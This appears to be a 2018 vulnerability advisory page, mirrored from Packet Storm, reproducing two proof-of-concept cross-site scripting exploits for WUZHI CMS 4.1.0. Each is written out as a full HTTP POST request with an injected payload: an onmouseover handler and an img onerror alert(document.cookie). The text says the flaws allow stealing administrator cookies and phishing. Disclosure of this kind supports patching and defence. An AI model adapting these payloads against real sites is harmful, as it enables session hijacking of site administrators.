Wuzhi CMS 4.1.0 Cross Site Scripting

🗓️ 13 May 2018 00:00:00Reported by jiguangType

packetstorm🔗 packetstormsecurity.com👁 68 Views

Wuzhi CMS 4.1.0 XSS vulnerabilities discovered in member and tags page

Reporter	Title	Published	Views	Family All 20
0day.today	WUZHI CMS 4.1.0 - form[qq_10] Cross-Site Scripting Vulnerability	13 May 201800:00	–	zdt
0day.today	WUZHI CMS 4.1.0 - tag[pinyin] Cross-Site Scripting Vulnerability	13 May 201800:00	–	zdt
CNVD	WUZHI CMS Cross-Site Scripting Vulnerability	24 Apr 201800:00	–	cnvd
CNVD	WUZHI CMS Cross-Site Scripting Vulnerability (CNVD-2018-08546)	24 Apr 201800:00	–	cnvd
CVE	CVE-2018-10311	24 Apr 201802:00	–	cve
CVE	CVE-2018-10313	24 Apr 201802:00	–	cve
Cvelist	CVE-2018-10311	24 Apr 201802:00	–	cvelist
Cvelist	CVE-2018-10313	24 Apr 201802:00	–	cvelist
Exploit DB	WUZHI CMS 4.1.0 - 'form[qq_10]' Cross-Site Scripting	13 May 201800:00	–	exploitdb
Exploit DB	WUZHI CMS 4.1.0 - 'tag[pinyin]' Cross-Site Scripting	13 May 201800:00	–	exploitdb

`Exploit 1 of 2:  
  
# Exploit Title: WUZHI CMS 4.1.0 XSS Vulnerability  
# Date: 2018-4-23  
# Exploit Author: jiguang ([email protected])  
# Vendor Homepage: https://github.com/wuzhicms/wuzhicms  
# Software Link: https://github.com/wuzhicms/wuzhicms  
# Version: 4.1.0  
# CVE: CVE-2018-10313  
  
An issue was discovered in WUZHI CMS 4.1.0 (https://github.com/wuzhicms/wuzhicms/issues/133)  
There is a xss vulnerability that can stealing administrator cookie, fishing attack, etc. via the form%5Bqq_10%5D parameter post to the /index.php?m=member&f=index&v=profile&set_iframe=1  
  
`POST /wuzhi/www/index.php?m=member&f=index&v=profile&set_iframe=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://localhost/wuzhi/www/index.php?m=member&f=index&v=profile&set_iframe=1 Content-Type: application/x-www-form-urlencoded Content-Length: 74 Cookie: PHPSESSID=uk4g8bm4l96iv5rl6ej2re83a3; EkT_siteid=Wl70z0XOgxO6TVPS70twsg%3D%3D; EkT_qkey=jiPLTZIrWUySV8FmwZwibPjlIPfq0nTj; EkT_userkeys=e7%2FCIDS8IFYxTUG8kAb7Ww%3D%3D; EkT_truename=yuduo; EkT_auth=lwMUjMOtAXpsQyZViV3zkNdoXMK7Up5NWRRI4Ro4FDKECQHhZ1ntK0WcBotqHVYyx3z9AYABYpAsEx4OdqcExF5S1d7Gw31AvtN07WdqMw28yLCoyNv8RA%3D%3D; EkT__uid=ocqUyYLd7bm05%2Ft4KcS%2B6Q%3D%3D; EkT__username=URDJ1YisL%2BXkt7Mzgg3aNA%3D%3D; EkT__groupid=aZR0cJTYiMBkLfoq8PwJ0g%3D%3D; EkT_modelid=10; tFf_uid=ej6BNn7ulZVYfrHwlgXMvg%3D%3D; tFf_username=YuhCykTKqrPt5fHl2zROVg%3D%3D; tFf_wz_name=IAFonn80xi%2FUvXNXx8uR%2FQ%3D%3D; tFf_siteid=dUi1cO%2FrqMr0atgyt9b%2BNw%3D%3D; tFf_auth=EVUCupGrAYuOzHKFNYqbS%2B39rd2Ynyn74kyNU3KlUwiQCJGQMAgEMU0go7SqkJsUA8kNZq6BsF5nFNbEeL5ehNOQ5DkCGZ4h4JnRqFB8UFIh9kWHsJe84Q%3D%3D; tFf__uid=FM0wd0X5ONWZsKHK8N3j%2Fw%3D%3D; tFf__username=haycqodNzDQbfpqnsWY3xA%3D%3D; tFf__groupid=I7EFExZnf2tvQCMhDV%2B1nA%3D%3D; tFf_truename=yuduo; tFf_modelid=10; SwW_uid=Bk1YojgAB4vSAv%2BmPy3WYg%3D%3D; SwW_username=BTEh6yj6GaEMdyByi0JOZw%3D%3D; SwW_wz_name=8vypKiZ6Ck1JQloRN3gGZQ%3D%3D; SwW_siteid=jm2uH%2FJAmU8uh1X4AlQ1nQ%3D%3D; SwW_qkey=sSAglhFB%2F04GAI1A3H4vDpnfBjktIjQO; SwW_truename=yuyuyu; SwW_auth=qVG8d0BqbIYaHf7emEsG%2Bz%2Fo4LTxYomIRzLjUyu1wWd0BfW4Eucw1UXVm3OTEBexHDGzzwvYarSW62r%2F%2BZrP6RZloFSgyn1%2B5QSsfVv8XDbbIN5Wzd32rQ%3D%3D; SwW__uid=SQgSrskOQqPeThE7vxpQuQ%3D%3D; SwW__username=ZnY2K%2B8IB6WgdsrHTD%2F%2Fzg%3D%3D; SwW__groupid=wVnor3QYe03CC%2B9JInwPIQ%3D%3D; SwW_modelid=10 Connection: close Upgrade-Insecure-Requests: 1  
  
`form%5Bqq_10%5D`=234234" onmouseover="confirm(22)&submit=%E6%8F%90%E4%BA%A4`  
  
  
------  
Exploit 2 of 2:  
  
# Exploit Title: WUZHI CMS 4.1.0 XSS Vulnerability  
# Date: 2018-4-23  
# Exploit Author: jiguang ([email protected])  
# Vendor Homepage: https://github.com/wuzhicms/wuzhicms  
# Software Link: https://github.com/wuzhicms/wuzhicms  
# Version: 4.1.0  
# CVE: CVE-2018-10311  
  
An issue was discovered in WUZHI CMS 4.1.0 (https://github.com/wuzhicms/wuzhicms/issues/131)  
There is a xss vulnerability that can stealing administrator cookie, fishing attack, etc. via the tag[pinyin] parameter post to the /index.php?m=tags&f=index&v=add&&_su=wuzhicms&_menuid=?&_submenuid=?  
  
  
`[POST /www/index.php?m=tags&f=index&v=add&&_su=wuzhicms&_menuid=95&_submenuid=101 HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/www/index.php?m=tags&f=index&v=add&&_su=wuzhicms&_menuid=95&_submenuid=101  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 270  
Cookie: PHPSESSID=uk4g8bm4l96iv5rl6ej2re83a3; EkT_uid=c%2FzWH2EByNj%2Fm78WencnAg%3D%3D; EkT_username=oR5iColhZ3j6z343ib%2B9Lg%3D%3D; EkT_wz_name=LVeemy520l5DQnc4SQGtsw%3D%3D; EkT_siteid=Wl70z0XOgxO6TVPS70twsg%3D%3D; EkT_qkey=jiPLTZIrWUySV8FmwZwibPjlIPfq0nTj  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
tag%5Btag%5D=jiguang&tag%5Btitle%5D=jiguang&tag%5Bkeyword%5D=jiguang&tag%5Bdesc%5D=jiguang&tag%5Bisshow%5D=1&tag%5Blinkageid%5D=0&LK2_1=0&## tag%5Bpinyin%5D=ji%3Cimg%2Fsrc%3D1+onerror%3Dalert%28document.cookie%29%3E&tag%5Bletter%5D=&tag%5Burl%5D=&submit=%E6%8F%90+%E4%BA%A4](url)`  
  
------------------  
  
`

13 May 2018 00:00Current

EPSS0.00437